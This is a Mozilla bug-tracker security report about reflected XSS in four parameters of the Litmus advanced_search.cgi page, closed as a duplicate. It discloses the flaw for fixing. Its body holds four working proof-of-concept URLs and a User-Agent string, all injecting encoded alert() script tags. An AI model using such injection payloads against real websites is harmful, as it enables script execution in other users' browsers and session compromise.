Closed
Bug 622186
Opened 14 years ago
Closed 13 years ago
Four variables vulnerable to XSS
Categories
(Webtools Graveyard :: Litmus, defect)
Webtools Graveyard
Litmus
Tracking
(Not tracked)
RESOLVED
DUPLICATE
of bug 613272
People
(Reporter: firealwaysworks, Unassigned)
References
()
Details
(Whiteboard: [infrasec:xss][ws:high])
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.8) Gecko/20100723 <script>alert(/xss/)</script>/9.04 (jaunty) Firefox/3.6.8 Build Identifier: The four variables are: test_run, result_status, locale and match_criteria2 https://litmus.mozilla.org/advanced_search.cgi?testcase=15017&test_run=%27%3CScRiPt%3Ealert%28/xss/%29%3C/ScRiPt%3E https://litmus.mozilla.org/advanced_search.cgi?result_status=%27%3CScRiPt%3Ealert%28/xss/%29%3C/ScRiPt%3E&limit=50&order_by_created=DESC×pan=all https://litmus.mozilla.org/advanced_search.cgi?timespan=&locale=%27%3CScRiPt%3Ealert%28/xss/%29%3C/ScRiPt%3E&vetted_only=all&trusted_only=all&test_run=195&match_criteria2=contains_any&sort_order1=ASC&opsys=39&vetted_end_date=&platform=15&sort_order2=ASC&sort_order3=ASC&sort_order4=ASC&branch=36&search_value3=&search_value2=ahoza%40softvision.ro&search_value1=20101227011409&start_date=&search_value4=&match_criteria4=contains_all&product=11&match_criteria1=contains_any&end_date=&match_criteria3=contains_all&search_field4=&search_field2=email&search_field3=&search_field1=build_id&automated=all&testgroup=&withbugs=all&result_status=pass&sort_field2=&sort_field3=&sort_field4=&valid_only=all&testcase=&limit=15&sort_field1=&vetted_start_date=&subgroup= https://litmus.mozilla.org/advanced_search.cgi?timespan=&locale=&vetted_only=all&trusted_only=all&test_run=195&match_criteria2=%3CScRiPt%3Ealert%28/xss/%29%3C/ScRiPt%3E&sort_order1=ASC&opsys=39&vetted_end_date=&platform=15&sort_order2=ASC&sort_order3=ASC&sort_order4=ASC&branch=36&search_value3=&search_value2=ahoza%40softvision.ro&search_value1=20101227011409&start_date=&search_value4=&match_criteria4=contains_all&product=11&match_criteria1=contains_any&end_date=&match_criteria3=contains_all&search_field4=&search_field2=email&search_field3=&search_field1=build_id&automated=all&testgroup=&withbugs=all&result_status=pass&sort_field2=&sort_field3=&sort_field4=&valid_only=all&testcase=&limit=15&sort_field1=&vetted_start_date=&subgroup= Reproducible: Always Steps to Reproduce: 1.Click on one of the 4 links 2.alert() will be executed
Updated•14 years ago
|
Group: websites-security → webtools-security
Component: Other → Litmus
OS: Linux → All
Product: Websites → Webtools
QA Contact: other → litmus
Hardware: x86 → All
Version: unspecified → Trunk
Updated•14 years ago
|
Whiteboard: [ws:need triage]
Updated•14 years ago
|
Whiteboard: [ws:need triage] → [infrasec:xss][ws:high]
Updated•13 years ago
|
Status: NEW → RESOLVED
Closed: 13 years ago
Resolution: --- → DUPLICATE
Updated•12 years ago
|
Group: webtools-security
Assignee | ||
Updated•8 years ago
|
Product: Webtools → Webtools Graveyard
You need to log in
before you can comment on or make changes to this bug.
Description
•